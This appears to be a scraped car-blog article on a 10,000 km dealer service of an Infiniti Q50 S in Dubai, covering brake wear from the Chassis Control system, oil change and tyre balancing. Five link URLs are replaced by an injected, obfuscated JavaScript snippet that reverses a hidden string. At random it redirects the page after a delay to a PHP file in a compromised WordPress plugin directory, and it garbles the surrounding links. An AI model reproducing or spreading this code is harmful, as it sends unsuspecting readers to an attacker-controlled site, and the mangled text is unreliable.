Since joining us, $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/infiniti-q50-s-new-arrival-management-fleet/”>our new Infiniti Q50 S has proven itself to be a pretty durable car: powerful when needed courtesy of that 326bhp 3.7-litre V6, comfortable at all times, and a striking design to boot. Unsurprisingly then we’ve put a fair amount of mileage on our newboy, a fact that has also coincided with the saloon’s 10K service. Cue a canter across to the Infiniti Service Centre in Al Quoz, Dubai. Or, as our US-spec SatNav suggested, downtown Los Angeles.

Having been welcomed at reception by Savio – our service advisor – with a cheery smile and a surprisingly firm handshake, we were quickly introduced to the doctor’s surgery in which our $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/infiniti/”>Infiniti would be given a thorough medical. And we do mean ‘thorough’, since the checklist for a 10K kilometre service is humongous: signal lights, windows, an oil check, brakes, driveshaft, and a considerable list of other electronics that may have received a bashing from the Middle Eastern heat.

Once the bare essentials had been given the once over – brake lights, indicators, windscreen wipers, etc – the Q50 S was lifted for further analysis. A few ‘hmm’s and ’huh’s were directed by our service team towards the brake pads and their respective depletion. The front pads, as you’d imagine after 10,000km, looked pretty second hand. But at the rear, the depletion was much less consistent. This I was told by our dutiful service team was a result of $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/lifestyle/do-driver-aids-make-us-worse-drivers/”>Infiniti’s Chassis Control system, which uses the brakes at the rear to bring the Q50 S back into lane on the highway should it begin to stray, thus leaving the front discs available for the driver. It’s a clever system, but one that required some new rear brake pads and resurfacing work on the discs.

Infiniti-Q50S-Service-27$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2014/08/Infiniti-Q50S-Service-27.jpg” width=”728″ height=”485″ />

While one attendant focused on the brakes, another set about balancing the tyres, changing the oil and checking the battery voltage, finishing his role off by giving the engine bay a quick bath. Once wheels and brakes had been re-attached, all that was needed was a quick test drive by a qualified technician to make sure everything was in full working order. All of which was wrapped up in just over two hours. Kudos to the $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/infiniti/”>Infiniti service team indeed.
